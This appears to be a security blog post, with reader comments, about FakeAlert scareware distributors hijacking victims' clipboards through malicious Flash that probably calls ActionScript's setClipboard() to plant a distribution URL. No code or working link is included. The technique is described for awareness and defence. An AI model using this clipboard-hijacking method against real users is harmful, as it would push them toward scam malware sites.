I was able to get the test website to load into clipboard while browsing in safari under OSX 10.5.4 on my macbook pro. It also affected 3 versions of firefox running in OSX, Linux (FC6), and XP, all with the NoScript plugin. IE6 and IE7 were affected as well.
Only under IE was it able to use the clipboard to load the “evil” url. So it’s not as effective on Linux/OS X but it can get part of the way there.
Where is this "test website?" I can't seem to find it. Gat a link?
Pwning the clipboard - latest trick used in FakeAlert distributionThere are certain notorious threats for which the mere mention of their name can make malware analysts groan - Zlob, Pushdo, Dorf (aka Storm) to name but a few. Just recently, a new class of malware is starting to have that same effect - we are seeing an abundance of ‘fake alert’ trojans. This is malware designed to scam the victim into paying money to remove non-existent threats [1,2].
If the professional looking sites that are being used to distribute this fake alert malware are anything to go by, the criminals behind it are very organized. They are making significant efforts to evade detection and filtering - using polymorphic packing techniques and hosting the content on numerous domains.
They are using aggressive techniques to infect victims as well - for example large spam campaigns and compromised web sites. At the end of last week another interesting technique was discovered - they were clobbering the contents of the user clipboard with the URL of their distribution site. Numerous postings to various forums reported similar issues, for example [3]:
“I’m going crazy here. Any time I copy a url by selecting it, then pressing ctrl+c, the next time I paste something it comes up with this link: http://[removed].net /?id=… (link intentionally broken) … Probably spam/virus link … I wouldn’t click on it.For instance, I copy “http://www.google.com” onto window’s clipboard and what I paste is the former url. I had this happen a week ago, so I scanned my drives with AVG (found nothing). So, I reformatted my harddrive and reinstalled windows. Now, a week later, it’s doing it again. Does anyone have _any_ idea what this is coming from?“
So, the attackers are overwriting the victim clipboard in the hope that the victim subsequently pastes the URL somewhere that may result in traffic to their site. Not that unlikely, users frequently copy and paste links to each other via email, IM, or comment postings.
A nasty little trick - but is it anything new? No, techniques to automatically copy data to the system clipboard using common scripting languages (Javascript and ActionScript) are well known.
The fact that victims report experiencing these issues after browsing legitimate, popular sites, suggests that malicious Flash is the culprit. The attackers are probably using the setClipboard() method [4] within ActionScript embedded in Flash content. Maybe the attackers have poisoned some ad-stream as a way of hitting large volumes of users?
At the time of writing, I am aware of the victim clipboard getting overwritten with either of two URLs. In each case browsing to the URL will result in the fake system scan running on the victim machine, very similar to that reported here.
I guess we should be glad the Adobe folks were wise enough to not provide the corresponding getClipboard() method!
The clipboard hijack exploit DOES INDEED work on an OSX Mac with Safari!
Security researcher Aviv Raff has created a proof-of-concept demo to show how easy it is to use Flash with ActionScript code to load (persistently) a malicious URL into a target clipboard. (BEWARE: If you click on the demo link, your clipboard is automatically hijacked and will only be released if the browser window is closed).
For those of you who want to try it, the link to the demo page is below:
I have found, however, that with a Mac, simply navigating away from the offending hijacking website will end the attack. There is no need to close the browser window.
NoScript will not block flash script exploits. The best security combo for Firefox is AdblockPlus+NoScript+FlashBlock. And if you are really surf paranoid, get ImgLikeOpera extension for FF too, it lets you block all graphics (to avoid rare GIF exploits).